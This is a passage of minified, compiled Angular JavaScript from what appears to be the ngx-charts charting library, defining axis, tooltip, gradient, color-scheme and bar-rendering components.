t})();let fq=(()=>{class t{constructor(e){this.textHeight=25,this.margin=5,this.element=e.nativeElement}ngOnChanges(e){this.update()}update(){switch(this.strokeWidth="0.01",this.textAnchor="middle",this.transform="",this.orient){case Fs.Top:case Fs.Bottom:this.y=this.offset,this.x=this.width/2;break;case Fs.Left:this.y=-(this.offset+this.textHeight+this.margin),this.x=-this.height/2,this.transform="rotate(270)";break;case Fs.Right:this.y=this.offset+this.margin,this.x=-this.height/2,this.transform="rotate(270)"}}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-axis-label",""]],inputs:{orient:"orient",label:"label",offset:"offset",width:"width",height:"height"},features:[sa],attrs:hEe,decls:2,vars:6,template:function(e,i){1&e&&(fi(),m(0,"text"),s(1),u()),2&e&&(Rt("stroke-width",i.strokeWidth)("x",i.x)("y",i.y)("text-anchor",i.textAnchor)("transform",i.transform),C(1),ct(" ",i.label," "))},encapsulation:2,changeDetection:0}),t})();function QI(t,a=16){return"string"!=typeof t?"number"==typeof t?t+"":"":(t=t.trim()).length<=a?t:`${t.slice(0,a)}...`}function pq(t,a){if(t.length>a){const e=[],i=Math.floor(t.length/a);for(let n=0;n<t.length;n++)n%i==0&&e.push(t[n]);t=e}return t}var km=(()=>{return(t=km||(km={})).Start="start",t.Middle="middle",t.End="end",km;var t})();let _q=(()=>{class t{constructor(e){this.platformId=e,this.tickArguments=[5],this.tickStroke="#ccc",this.trimTicks=!0,this.maxTickLength=16,this.showGridLines=!1,this.rotateTicks=!0,this.dimensionsChanged=new Tt,this.verticalSpacing=20,this.rotateLabels=!1,this.innerTickSize=6,this.outerTickSize=6,this.tickPadding=3,this.textAnchor=km.Middle,this.maxTicksLength=0,this.maxAllowedLength=16,this.height=0,this.approxHeight=10}ngOnChanges(e){this.update()}ngAfterViewInit(){setTimeout(()=>this.updateDims())}updateDims(){if(!ag(this.platformId))return void this.dimensionsChanged.emit({height:this.approxHeight});const e=parseInt(this.ticksElement.nativeElement.getBoundingClientRect().height,10);e!==this.height&&(this.height=e,this.dimensionsChanged.emit({height:this.height}),setTimeout(()=>this.updateDims()))}update(){const e=this.scale;this.ticks=this.getTicks(),this.tickFormat=this.tickFormatting?this.tickFormatting:e.tickFormat?e.tickFormat.apply(e,this.tickArguments):function(n){return"Date"===n.constructor.name?n.toLocaleDateString():n.toLocaleString()};const i=this.rotateTicks?this.getRotationAngle(this.ticks):null;this.adjustedScale=this.scale.bandwidth?function(n){return this.scale(n)+.5*this.scale.bandwidth()}:this.scale,this.textTransform="",i&&0!==i?(this.textTransform=`rotate(${i})`,this.textAnchor=km.End,this.verticalSpacing=10):this.textAnchor=km.Middle,setTimeout(()=>this.updateDims())}getRotationAngle(e){let i=0;this.maxTicksLength=0;for(let k=0;k<e.length;k++){const q=this.tickFormat(e[k]).toString();let Y=q.length;this.trimTicks&&(Y=this.tickTrim(q).length),Y>this.maxTicksLength&&(this.maxTicksLength=Y)}const c=7*Math.min(this.maxTicksLength,this.maxAllowedLength);let d=c;const T=Math.floor(this.width/e.length);for(;d>T&&i>-90;)i-=30,d=Math.cos(i*(Math.PI/180))*c;return this.approxHeight=Math.max(Math.abs(Math.sin(i*(Math.PI/180))*c),10),i}getTicks(){let e;const i=this.getMaxTicks(20),n=this.getMaxTicks(100);return this.tickValues?e=this.tickValues:this.scale.ticks?e=this.scale.ticks.apply(this.scale,[n]):(e=this.scale.domain(),e=pq(e,i)),e}getMaxTicks(e){return Math.floor(this.width/e)}tickTransform(e){return"translate("+this.adjustedScale(e)+","+this.verticalSpacing+")"}gridLineTransform(){return`translate(0,${-this.verticalSpacing-5})`}tickTrim(e){return this.trimTicks?QI(e,this.maxTickLength):e}}return t.\u0275fac=function(e){return new(e||t)(Ee(lm))},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-x-axis-ticks",""]],viewQuery:function(e,i){if(1&e&&Mi(nq,5),2&e){let n;Vt(n=Bt())&&(i.ticksElement=n.first)}},inputs:{scale:"scale",orient:"orient",tickArguments:"tickArguments",tickValues:"tickValues",tickStroke:"tickStroke",trimTicks:"trimTicks",maxTickLength:"maxTickLength",tickFormatting:"tickFormatting",showGridLines:"showGridLines",gridLineHeight:"gridLineHeight",width:"width",rotateTicks:"rotateTicks"},outputs:{dimensionsChanged:"dimensionsChanged"},features:[sa],attrs:fEe,decls:4,vars:2,consts:[["ticksel",""],["class","tick",4,"ngFor","ngForOf"],[4,"ngFor","ngForOf"],[1,"tick"],["stroke-width","0.01"],[4,"ngIf"],["y2","0",1,"gridline-path","gridline-path-vertical"]],template:function(e,i){1&e&&(fi(),m(0,"g",null,0),ne(2,pEe,5,7,"g",1),u(),ne(3,gEe,2,2,"g",2)),2&e&&(C(2),V("ngForOf",i.ticks),C(1),V("ngForOf",i.ticks))},dependencies:[Zi,Ri],encapsulation:2,changeDetection:0}),t})(),_6e=(()=>{class t{constructor(){this.rotateTicks=!0,this.showGridLines=!1,this.xOrient=Fs.Bottom,this.xAxisOffset=0,this.dimensionsChanged=new Tt,this.xAxisClassName="x axis",this.labelOffset=0,this.fill="none",this.stroke="stroke",this.tickStroke="#ccc",this.strokeWidth="none",this.padding=5,this.orientation=Fs}ngOnChanges(e){this.update()}update(){this.transform=`translate(0,${this.xAxisOffset+this.padding+this.dims.height})`,void 0!==this.xAxisTickCount&&(this.tickArguments=[this.xAxisTickCount])}emitTicksHeight({height:e}){const i=e+25+5;i!==this.labelOffset&&(this.labelOffset=i,setTimeout(()=>{this.dimensionsChanged.emit({height:e})},0))}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-x-axis",""]],viewQuery:function(e,i){if(1&e&&Mi(_q,5),2&e){let n;Vt(n=Bt())&&(i.ticksComponent=n.first)}},inputs:{xScale:"xScale",dims:"dims",trimTicks:"trimTicks",rotateTicks:"rotateTicks",maxTickLength:"maxTickLength",tickFormatting:"tickFormatting",showGridLines:"showGridLines",showLabel:"showLabel",labelText:"labelText",ticks:"ticks",xAxisTickCount:"xAxisTickCount",xOrient:"xOrient",xAxisOffset:"xAxisOffset"},outputs:{dimensionsChanged:"dimensionsChanged"},features:[sa],attrs:CEe,decls:3,vars:4,consts:[["ngx-charts-x-axis-ticks","",3,"trimTicks","rotateTicks","maxTickLength","tickFormatting","tickArguments","tickStroke","scale","orient","showGridLines","gridLineHeight","width","tickValues","dimensionsChanged",4,"ngIf"],["ngx-charts-axis-label","",3,"label","offset","orient","height","width",4,"ngIf"],["ngx-charts-x-axis-ticks","",3,"trimTicks","rotateTicks","maxTickLength","tickFormatting","tickArguments","tickStroke","scale","orient","showGridLines","gridLineHeight","width","tickValues","dimensionsChanged"],["ngx-charts-axis-label","",3,"label","offset","orient","height","width"]],template:function(e,i){1&e&&(fi(),m(0,"g"),ne(1,yEe,1,12,"g",0),ne(2,bEe,1,5,"g",1),u()),2&e&&(Rt("class",i.xAxisClassName)("transform",i.transform),C(1),V("ngIf",i.xScale),C(1),V("ngIf",i.showLabel))},dependencies:[_q,fq,Ri],encapsulation:2,changeDetection:0}),t})();function wp(t,a,e,i,n,[r,c,d,T]){let k="";return k=`M${[t+n,a]}`,k+="h"+((e=0===(e=Math.floor(e))?1:e)-2*n),k+=c?`a${[n,n]} 0 0 1 ${[n,n]}`:`h${n}v${n}`,k+="v"+((i=0===(i=Math.floor(i))?1:i)-2*n),k+=T?`a${[n,n]} 0 0 1 ${[-n,n]}`:`v${n}h${-n}`,k+="h"+(2*n-e),k+=d?`a${[n,n]} 0 0 1 ${[-n,-n]}`:`h${-n}v${-n}`,k+="v"+(2*n-i),k+=r?`a${[n,n]} 0 0 1 ${[n,-n]}`:`v${-n}h${n}`,k+="z",k}let gq=(()=>{class t{constructor(e){this.platformId=e,this.tickArguments=[5],this.tickStroke="#ccc",this.trimTicks=!0,this.maxTickLength=16,this.showGridLines=!1,this.showRefLabels=!1,this.showRefLines=!1,this.dimensionsChanged=new Tt,this.innerTickSize=6,this.tickPadding=3,this.verticalSpacing=20,this.textAnchor=km.Middle,this.width=0,this.outerTickSize=6,this.rotateLabels=!1,this.referenceLineLength=0,this.Orientation=Fs}ngOnChanges(e){this.update()}ngAfterViewInit(){setTimeout(()=>this.updateDims())}updateDims(){if(!ag(this.platformId))return this.width=this.getApproximateAxisWidth(),void this.dimensionsChanged.emit({width:this.width});const e=parseInt(this.ticksElement.nativeElement.getBoundingClientRect().width,10);e!==this.width&&(this.width=e,this.dimensionsChanged.emit({width:e}),setTimeout(()=>this.updateDims()))}update(){let e;const i=this.orient===Fs.Top||this.orient===Fs.Right?-1:1;switch(this.tickSpacing=Math.max(this.innerTickSize,0)+this.tickPadding,e=this.scale,this.ticks=this.getTicks(),this.tickFormat=this.tickFormatting?this.tickFormatting:e.tickFormat?e.tickFormat.apply(e,this.tickArguments):function(n){return"Date"===n.constructor.name?n.toLocaleDateString():n.toLocaleString()},this.adjustedScale=e.bandwidth?function(n){return e(n)+.5*e.bandwidth()}:e,this.showRefLines&&this.referenceLines&&this.setReferencelines(),this.orient){case Fs.Top:case Fs.Bottom:this.transform=function(n){return"translate("+this.adjustedScale(n)+",0)"},this.textAnchor=km.Middle,this.y2=this.innerTickSize*i,this.y1=this.tickSpacing*i,this.dy=i<0?"0em":".71em";break;case Fs.Left:this.transform=function(n){return"translate(0,"+this.adjustedScale(n)+")"},this.textAnchor=km.End,this.x2=this.innerTickSize*-i,this.x1=this.tickSpacing*-i,this.dy=".32em";break;case Fs.Right:this.transform=function(n){return"translate(0,"+this.adjustedScale(n)+")"},this.textAnchor=km.Start,this.x2=this.innerTickSize*-i,this.x1=this.tickSpacing*-i,this.dy=".32em"}setTimeout(()=>this.updateDims())}setReferencelines(){this.refMin=this.adjustedScale(Math.min.apply(null,this.referenceLines.map(e=>e.value))),this.refMax=this.adjustedScale(Math.max.apply(null,this.referenceLines.map(e=>e.value))),this.referenceLineLength=this.referenceLines.length,this.referenceAreaPath=wp(0,this.refMax,this.gridLineWidth,this.refMin-this.refMax,0,[!1,!1,!1,!1])}getTicks(){let e;const i=this.getMaxTicks(20),n=this.getMaxTicks(50);return this.tickValues?e=this.tickValues:this.scale.ticks?e=this.scale.ticks.apply(this.scale,[n]):(e=this.scale.domain(),e=pq(e,i)),e}getMaxTicks(e){return Math.floor(this.height/e)}tickTransform(e){return`translate(${this.adjustedScale(e)},${this.verticalSpacing})`}gridLineTransform(){return"translate(5,0)"}tickTrim(e){return this.trimTicks?QI(e,this.maxTickLength):e}getApproximateAxisWidth(){return 7*Math.max(...this.ticks.map(n=>this.tickTrim(this.tickFormat(n)).length))}}return t.\u0275fac=function(e){return new(e||t)(Ee(lm))},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-y-axis-ticks",""]],viewQuery:function(e,i){if(1&e&&Mi(nq,5),2&e){let n;Vt(n=Bt())&&(i.ticksElement=n.first)}},inputs:{scale:"scale",orient:"orient",tickArguments:"tickArguments",tickValues:"tickValues",tickStroke:"tickStroke",trimTicks:"trimTicks",maxTickLength:"maxTickLength",tickFormatting:"tickFormatting",showGridLines:"showGridLines",gridLineWidth:"gridLineWidth",height:"height",referenceLines:"referenceLines",showRefLabels:"showRefLabels",showRefLines:"showRefLines"},outputs:{dimensionsChanged:"dimensionsChanged"},features:[sa],attrs:MEe,decls:6,vars:4,consts:[["ticksel",""],["class","tick",4,"ngFor","ngForOf"],["class","reference-area",4,"ngIf"],[4,"ngFor","ngForOf"],[1,"tick"],["stroke-width","0.01"],[1,"reference-area"],[4,"ngIf"],["class","gridline-path gridline-path-horizontal","x1","0",4,"ngIf"],["x1","0",1,"gridline-path","gridline-path-horizontal"],["x1","0",1,"refline-path","gridline-path-horizontal"],[1,"refline-label"]],template:function(e,i){1&e&&(fi(),m(0,"g",null,0),ne(2,vEe,5,9,"g",1),u(),ne(3,AEe,1,2,"path",2),ne(4,xEe,2,2,"g",3),ne(5,REe,2,1,"g",3)),2&e&&(C(2),V("ngForOf",i.ticks),C(1),V("ngIf",i.referenceLineLength>1&&i.refMax&&i.refMin&&i.showRefLines),C(1),V("ngForOf",i.ticks),C(1),V("ngForOf",i.referenceLines))},dependencies:[Zi,Ri],encapsulation:2,changeDetection:0}),t})(),g6e=(()=>{class t{constructor(){this.showGridLines=!1,this.yOrient=Fs.Left,this.yAxisOffset=0,this.dimensionsChanged=new Tt,this.yAxisClassName="y axis",this.labelOffset=15,this.fill="none",this.stroke="#CCC",this.tickStroke="#CCC",this.strokeWidth=1,this.padding=5}ngOnChanges(e){this.update()}update(){this.offset=-(this.yAxisOffset+this.padding),this.yOrient===Fs.Right?(this.labelOffset=65,this.transform=`translate(${this.offset+this.dims.width} , 0)`):(this.offset=this.offset,this.transform=`translate(${this.offset} , 0)`),void 0!==this.yAxisTickCount&&(this.tickArguments=[this.yAxisTickCount])}emitTicksWidth({width:e}){e!==this.labelOffset&&this.yOrient===Fs.Right?(this.labelOffset=e+this.labelOffset,setTimeout(()=>{this.dimensionsChanged.emit({width:e})},0)):e!==this.labelOffset&&(this.labelOffset=e,setTimeout(()=>{this.dimensionsChanged.emit({width:e})},0))}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-y-axis",""]],viewQuery:function(e,i){if(1&e&&Mi(gq,5),2&e){let n;Vt(n=Bt())&&(i.ticksComponent=n.first)}},inputs:{yScale:"yScale",dims:"dims",trimTicks:"trimTicks",maxTickLength:"maxTickLength",tickFormatting:"tickFormatting",ticks:"ticks",showGridLines:"showGridLines",showLabel:"showLabel",labelText:"labelText",yAxisTickCount:"yAxisTickCount",yOrient:"yOrient",referenceLines:"referenceLines",showRefLines:"showRefLines",showRefLabels:"showRefLabels",yAxisOffset:"yAxisOffset"},outputs:{dimensionsChanged:"dimensionsChanged"},features:[sa],attrs:SEe,decls:3,vars:4,consts:[["ngx-charts-y-axis-ticks","",3,"trimTicks","maxTickLength","tickFormatting","tickArguments","tickValues","tickStroke","scale","orient","showGridLines","gridLineWidth","referenceLines","showRefLines","showRefLabels","height","dimensionsChanged",4,"ngIf"],["ngx-charts-axis-label","",3,"label","offset","orient","height","width",4,"ngIf"],["ngx-charts-y-axis-ticks","",3,"trimTicks","maxTickLength","tickFormatting","tickArguments","tickValues","tickStroke","scale","orient","showGridLines","gridLineWidth","referenceLines","showRefLines","showRefLabels","height","dimensionsChanged"],["ngx-charts-axis-label","",3,"label","offset","orient","height","width"]],template:function(e,i){1&e&&(fi(),m(0,"g"),ne(1,kEe,1,14,"g",0),ne(2,PEe,1,5,"g",1),u()),2&e&&(Rt("class",i.yAxisClassName)("transform",i.transform),C(1),V("ngIf",i.yScale),C(1),V("ngIf",i.showLabel))},dependencies:[gq,fq,Ri],encapsulation:2,changeDetection:0}),t})(),Cq=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[rn]]}),t})();var Og=(()=>{return(t=Og||(Og={})).popover="popover",t.tooltip="tooltip",Og;var t})(),Ip=(()=>{return(t=Ip||(Ip={}))[t.all="all"]="all",t[t.focus="focus"]="focus",t[t.mouseover="mouseover"]="mouseover",Ip;var t})();let $I=(()=>{class t{constructor(e,i,n){this.tooltipService=e,this.viewContainerRef=i,this.renderer=n,this.tooltipCssClass="",this.tooltipAppendToBody=!0,this.tooltipSpacing=10,this.tooltipDisabled=!1,this.tooltipShowCaret=!0,this.tooltipPlacement=kn.Top,this.tooltipAlignment=kn.Center,this.tooltipType=Og.popover,this.tooltipCloseOnClickOutside=!0,this.tooltipCloseOnMouseLeave=!0,this.tooltipHideTimeout=300,this.tooltipShowTimeout=100,this.tooltipShowEvent=Ip.all,this.tooltipImmediateExit=!1,this.show=new Tt,this.hide=new Tt}get listensForFocus(){return this.tooltipShowEvent===Ip.all||this.tooltipShowEvent===Ip.focus}get listensForHover(){return this.tooltipShowEvent===Ip.all||this.tooltipShowEvent===Ip.mouseover}ngOnDestroy(){this.hideTooltip(!0)}onFocus(){this.listensForFocus&&this.showTooltip()}onBlur(){this.listensForFocus&&this.hideTooltip(!0)}onMouseEnter(){this.listensForHover&&this.showTooltip()}onMouseLeave(e){if(this.listensForHover&&this.tooltipCloseOnMouseLeave){if(clearTimeout(this.timeout),this.component&&this.component.instance.element.nativeElement.contains(e))return;this.hideTooltip(this.tooltipImmediateExit)}}onMouseClick(){this.listensForHover&&this.hideTooltip(!0)}showTooltip(e){if(this.component||this.tooltipDisabled)return;const i=e?0:this.tooltipShowTimeout+(navigator.userAgent.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/)?300:0);clearTimeout(this.timeout),this.timeout=setTimeout(()=>{this.tooltipService.destroyAll();const n=this.createBoundOptions();this.component=this.tooltipService.create(n),setTimeout(()=>{this.component&&this.addHideListeners(this.component.instance.element.nativeElement)},10),this.show.emit(!0)},i)}addHideListeners(e){this.mouseEnterContentEvent=this.renderer.listen(e,"mouseenter",()=>{clearTimeout(this.timeout)}),this.tooltipCloseOnMouseLeave&&(this.mouseLeaveContentEvent=this.renderer.listen(e,"mouseleave",()=>{this.hideTooltip(this.tooltipImmediateExit)})),this.tooltipCloseOnClickOutside&&(this.documentClickEvent=this.renderer.listen("window","click",i=>{e.contains(i.target)||this.hideTooltip()}))}hideTooltip(e=!1){if(!this.component)return;const i=()=>{this.mouseLeaveContentEvent&&this.mouseLeaveContentEvent(),this.mouseEnterContentEvent&&this.mouseEnterContentEvent(),this.documentClickEvent&&this.documentClickEvent(),this.hide.emit(!0),this.tooltipService.destroy(this.component),this.component=void 0};clearTimeout(this.timeout),e?i():this.timeout=setTimeout(i,this.tooltipHideTimeout)}createBoundOptions(){return{title:this.tooltipTitle,template:this.tooltipTemplate,host:this.viewContainerRef.element,placement:this.tooltipPlacement,alignment:this.tooltipAlignment,type:this.tooltipType,showCaret:this.tooltipShowCaret,cssClass:this.tooltipCssClass,spacing:this.tooltipSpacing,context:this.tooltipContext}}}return t.\u0275fac=function(e){return new(e||t)(Ee(GI),Ee(fo),Ee(wr))},t.\u0275dir=Ot({type:t,selectors:[["","ngx-tooltip",""]],hostBindings:function(e,i){1&e&&he("focusin",function(){return i.onFocus()})("blur",function(){return i.onBlur()})("mouseenter",function(){return i.onMouseEnter()})("mouseleave",function(r){return i.onMouseLeave(r.target)})("click",function(){return i.onMouseClick()})},inputs:{tooltipCssClass:"tooltipCssClass",tooltipTitle:"tooltipTitle",tooltipAppendToBody:"tooltipAppendToBody",tooltipSpacing:"tooltipSpacing",tooltipDisabled:"tooltipDisabled",tooltipShowCaret:"tooltipShowCaret",tooltipPlacement:"tooltipPlacement",tooltipAlignment:"tooltipAlignment",tooltipType:"tooltipType",tooltipCloseOnClickOutside:"tooltipCloseOnClickOutside",tooltipCloseOnMouseLeave:"tooltipCloseOnMouseLeave",tooltipHideTimeout:"tooltipHideTimeout",tooltipShowTimeout:"tooltipShowTimeout",tooltipTemplate:"tooltipTemplate",tooltipShowEvent:"tooltipShowEvent",tooltipContext:"tooltipContext",tooltipImmediateExit:"tooltipImmediateExit"},outputs:{show:"show",hide:"hide"}}),t})(),yq=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[sq,GI],imports:[[rn]]}),t})();const bq={};function qb(){let t=("0000"+(Math.random()*Math.pow(36,4)<<0).toString(36)).slice(-4);return t=`a${t}`,bq[t]?qb():(bq[t]=!0,t)}var as=(()=>{return(t=as||(as={})).Vertical="vertical",t.Horizontal="horizontal",as;var t})();let KI,cT=(()=>{class t{constructor(){this.orientation=as.Vertical}ngOnChanges(e){this.x1="0%",this.x2="0%",this.y1="0%",this.y2="0%",this.orientation===as.Horizontal?this.x2="100%":this.orientation===as.Vertical&&(this.y1="100%")}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-svg-linear-gradient",""]],inputs:{orientation:"orientation",name:"name",stops:"stops"},features:[sa],attrs:OEe,decls:2,vars:6,consts:[[3,"id"],[3,"stop-color","stop-opacity",4,"ngFor","ngForOf"]],template:function(e,i){1&e&&(fi(),m(0,"linearGradient",0),ne(1,NEe,1,5,"stop",1),u()),2&e&&(V("id",i.name),Rt("x1",i.x1)("y1",i.y1)("x2",i.x2)("y2",i.y2),C(1),V("ngForOf",i.stops))},dependencies:[Zi],encapsulation:2,changeDetection:0}),t})();"undefined"!=typeof window?KI=window:"undefined"!=typeof global&&(KI=global);let Vd=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[rn,Cq,yq],rn,Cq,yq]}),t})(),Dq=[{name:"vivid",selectable:!0,group:Wa.Ordinal,domain:["#647c8a","#3f51b5","#2196f3","#00b862","#afdf0a","#a7b61a","#f3e562","#ff9800","#ff5722","#ff4514"]},{name:"natural",selectable:!0,group:Wa.Ordinal,domain:["#bf9d76","#e99450","#d89f59","#f2dfa7","#a5d7c6","#7794b1","#afafaf","#707160","#ba9383","#d9d5c3"]},{name:"cool",selectable:!0,group:Wa.Ordinal,domain:["#a8385d","#7aa3e5","#a27ea8","#aae3f5","#adcded","#a95963","#8796c0","#7ed3ed","#50abcc","#ad6886"]},{name:"fire",selectable:!0,group:Wa.Ordinal,domain:["#ff3d00","#bf360c","#ff8f00","#ff6f00","#ff5722","#e65100","#ffca28","#ffab00"]},{name:"solar",selectable:!0,group:Wa.Linear,domain:["#fff8e1","#ffecb3","#ffe082","#ffd54f","#ffca28","#ffc107","#ffb300","#ffa000","#ff8f00","#ff6f00"]},{name:"air",selectable:!0,group:Wa.Linear,domain:["#e1f5fe","#b3e5fc","#81d4fa","#4fc3f7","#29b6f6","#03a9f4","#039be5","#0288d1","#0277bd","#01579b"]},{name:"aqua",selectable:!0,group:Wa.Linear,domain:["#e0f7fa","#b2ebf2","#80deea","#4dd0e1","#26c6da","#00bcd4","#00acc1","#0097a7","#00838f","#006064"]},{name:"flame",selectable:!1,group:Wa.Ordinal,domain:["#A10A28","#D3342D","#EF6D49","#FAAD67","#FDDE90","#DBED91","#A9D770","#6CBA67","#2C9653","#146738"]},{name:"ocean",selectable:!1,group:Wa.Ordinal,domain:["#1D68FB","#33C0FC","#4AFFFE","#AFFFFF","#FFFC63","#FDBD2D","#FC8A25","#FA4F1E","#FA141B","#BA38D1"]},{name:"forest",selectable:!1,group:Wa.Ordinal,domain:["#55C22D","#C1F33D","#3CC099","#AFFFFF","#8CFC9D","#76CFFA","#BA60FB","#EE6490","#C42A1C","#FC9F32"]},{name:"horizon",selectable:!1,group:Wa.Ordinal,domain:["#2597FB","#65EBFD","#99FDD0","#FCEE4B","#FEFCFA","#FDD6E3","#FCB1A8","#EF6F7B","#CB96E8","#EFDEE0"]},{name:"neons",selectable:!1,group:Wa.Ordinal,domain:["#FF3333","#FF33FF","#CC33FF","#0000FF","#33CCFF","#33FFFF","#33FF66","#CCFF33","#FFCC00","#FF6600"]},{name:"picnic",selectable:!1,group:Wa.Ordinal,domain:["#FAC51D","#66BD6D","#FAA026","#29BB9C","#E96B56","#55ACD2","#B7332F","#2C83C9","#9166B8","#92E7E8"]},{name:"night",selectable:!1,group:Wa.Ordinal,domain:["#2B1B5A","#501356","#183356","#28203F","#391B3C","#1E2B3C","#120634","#2D0432","#051932","#453080","#75267D","#2C507D","#4B3880","#752F7D","#35547D"]},{name:"nightLights",selectable:!1,group:Wa.Ordinal,domain:["#4e31a5","#9c25a7","#3065ab","#57468b","#904497","#46648b","#32118d","#a00fb3","#1052a2","#6e51bd","#b63cc3","#6c97cb","#8671c1","#b455be","#7496c3"]}];class E6e{constructor(a,e,i,n){"string"==typeof a&&(a=Dq.find(r=>r.name===a)),this.colorDomain=a.domain,this.scaleType=e,this.domain=i,this.customColors=n,this.scale=this.generateColorScheme(a,e,this.domain)}generateColorScheme(a,e,i){let n;switch("string"==typeof a&&(a=Dq.find(r=>r.name===a)),e){case Wa.Quantile:n=iq().range(a.domain).domain(i);break;case Wa.Ordinal:n=qI().range(a.domain).domain(i);break;case Wa.Linear:{const r=[...a.domain];1===r.length&&(r.push(r[0]),this.colorDomain=r);const c=ZU(0,1,1/r.length);n=l2().range(r).domain(c)}}return n}getColor(a){if(null==a)throw new Error("Value can not be null");if(this.scaleType===Wa.Linear){const e=l2().domain(this.domain).range([0,1]);return this.scale(e(a))}{if("function"==typeof this.customColors)return this.customColors(a);const e=a.toString();let i;return this.customColors&&this.customColors.length>0&&(i=this.customColors.find(n=>n.name.toLowerCase()===e.toLowerCase())),i?i.value:this.scale(a)}}getLinearGradientStops(a,e){void 0===e&&(e=this.domain[0]);const i=l2().domain(this.domain).range([0,1]),n=sT().domain(this.colorDomain).range([0,1]),r=this.getColor(a),c=i(e),d=this.getColor(e),T=i(a);let k=1,q=c;const Y=[];for(Y.push({color:d,offset:c,originalOffset:c,opacity:1});q<T&&k<this.colorDomain.length;){const te=this.colorDomain[k],pe=n(te);if(pe<=c)k++;else{if(pe.toFixed(4)>=(T-n.bandwidth()).toFixed(4))break;Y.push({color:te,offset:pe,opacity:1}),q=pe,k++}}if(Y[Y.length-1].offset<100&&Y.push({color:r,offset:T,opacity:1}),T===c)Y[0].offset=0,Y[1].offset=100;else if(100!==Y[Y.length-1].offset)for(const te of Y)te.offset=(te.offset-c)/(T-c)*100;return Y}}let x6e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Vd]]}),t})(),w6e=(()=>{class t{constructor(e){this.roundEdges=!0,this.gradient=!1,this.offset=0,this.isActive=!1,this.animations=!0,this.noBarWhenZero=!0,this.select=new Tt,this.activate=new Tt,this.deactivate=new Tt,this.hasGradient=!1,this.hideBar=!1,this.element=e.nativeElement}ngOnChanges(e){e.roundEdges&&this.loadAnimation(),this.update()}update(){this.gradientId="grad"+qb().toString(),this.gradientFill=`url(#${this.gradientId})`,this.gradient||this.stops?(this.gradientStops=this.getGradient(),this.hasGradient=!0):this.hasGradient=!1,this.updatePathEl(),this.checkToHideBar()}loadAnimation(){this.path=this.getStartingPath(),setTimeout(this.update.bind(this),100)}updatePathEl(){const e=function Wd(t){return"string"==typeof t?new Il([[document.querySelector(t)]],[document.documentElement]):new Il([[t]],vH)}(this.element).select(".bar"),i=this.getPath();this.animations?e.transition().duration(500).attr("d",i):e.attr("d",i)}getGradient(){return this.stops?this.stops:[{offset:0,color:this.fill,opacity:this.getStartOpacity()},{offset:100,color:this.fill,opacity:1}]}getStartingPath(){if(!this.animations)return this.getPath();let i,e=this.getRadius();return this.roundEdges?this.orientation===as.Vertical?(e=Math.min(this.height,e),i=wp(this.x,this.y+this.height,this.width,1,0,this.edges)):this.orientation===as.Horizontal&&(e=Math.min(this.width,e),i=wp(this.x,this.y,1,this.height,0,this.edges)):this.orientation===as.Vertical?i=wp(this.x,this.y+this.height,this.width,1,0,this.edges):this.orientation===as.Horizontal&&(i=wp(this.x,this.y,1,this.height,0,this.edges)),i}getPath(){let i,e=this.getRadius();return this.roundEdges?this.orientation===as.Vertical?(e=Math.min(this.height,e),i=wp(this.x,this.y,this.width,this.height,e,this.edges)):this.orientation===as.Horizontal&&(e=Math.min(this.width,e),i=wp(this.x,this.y,this.width,this.height,e,this.edges)):i=wp(this.x,this.y,this.width,this.height,e,this.edges),i}getRadius(){let e=0;return this.roundEdges&&this.height>5&&this.width>5&&(e=Math.floor(Math.min(5,this.height/2,this.width/2))),e}getStartOpacity(){return this.roundEdges?.2:.5}get edges(){let e=[!1,!1,!1,!1];return this.roundEdges&&(this.orientation===as.Vertical?e=this.data.value>0?[!0,!0,!1,!1]:[!1,!1,!0,!0]:this.orientation===as.Horizontal&&(e=this.data.value>0?[!1,!0,!1,!0]:[!0,!1,!0,!1])),e}onMouseEnter(){this.activate.emit(this.data)}onMouseLeave(){this.deactivate.emit(this.data)}checkToHideBar(){this.hideBar=this.noBarWhenZero&&(this.orientation===as.Vertical&&0===this.height||this.orientation===as.Horizontal&&0===this.width)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-bar",""]],hostBindings:function(e,i){1&e&&he("mouseenter",function(){return i.onMouseEnter()})("mouseleave",function(){return i.onMouseLeave()})},inputs:{fill:"fill",data:"data",width:"width",height:"height",x:"x",y:"y",orientation:"orientation",roundEdges:"roundEdges",gradient:"gradient",offset:"offset",isActive:"isActive",stops:"stops",animations:"animations",ariaLabel:"ariaLabel",noBarWhenZero:"noBarWhenZero"},outputs:{select:"select",activate:"activate",deactivate:"deactivate"},features:[sa],attrs:_De,decls:2,vars:8,consts:[[4,"ngIf"],["stroke","none","role","img","tabIndex","-1",1,"bar",3,"click"],["ngx-charts-svg-linear-gradient","",3,"orientation","name","stops"]],template:function(e,i){1&e&&(ne(0,gDe,2,3,"defs",0),fi(),m(1,"path",1),he("click",function(){return i.select.emit(i.data)}),u()),2&e&&(V("ngIf",i.hasGradient),C(1),Ct("active",i.isActive)("hidden",i.hideBar),Rt("d",i.path)("aria-label",i.ariaLabel)("fill",i.hasGradient?i.gradientFill:i.fill))},dependencies:[cT,Ri],encapsulation:2,changeDetection:0}),t})();var Pm=(()=>{return(t=Pm||(Pm={})).Standard="standard",t.Normalized="normalized",t.Stacked="stacked",Pm;var t})(),Rp=(()=>{return(t=Rp||(Rp={})).positive="positive",t.negative="negative",Rp;var t})();let I6e=(()=>{class t{constructor(e){this.dimensionsChanged=new 